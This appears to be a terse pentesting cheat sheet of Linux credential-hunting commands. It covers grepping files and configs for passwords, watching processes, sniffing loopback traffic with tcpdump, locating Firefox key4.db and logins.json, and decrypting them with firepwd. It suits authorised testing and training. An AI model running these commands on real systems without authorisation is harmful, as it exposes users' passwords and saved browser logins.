Credential Hunting

History files

env
cat .bashrc

Credential Harvesting

grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
grep -v "^[#;]" /PATH/TO/FILE | grep -v "^$"    // grep for passwords like "DBPassword:"
watch -n 1 "ps -aux | grep pass"
sudo tcpdump -i lo -A | grep "pass"

Locally Stored Credentials

Search for credentials by trying various options like username, password, db_username, db_password, db_user etc.

grep -nr "username"
grep -nr "upassword"

Mozilla Firefox files

ls -l .mozilla
ls -l .mozilla/firefox/
ls -l .mozilla/firefox/sj1c9rus.default
ls -l .mozilla/firefox/sj1c9rus.default/key4.db
ls -l .mozilla/firefox/sj1c9rus.default/logins.json

We can decrypt the protected passwords using direpwd:

python firepwd.py -d /root/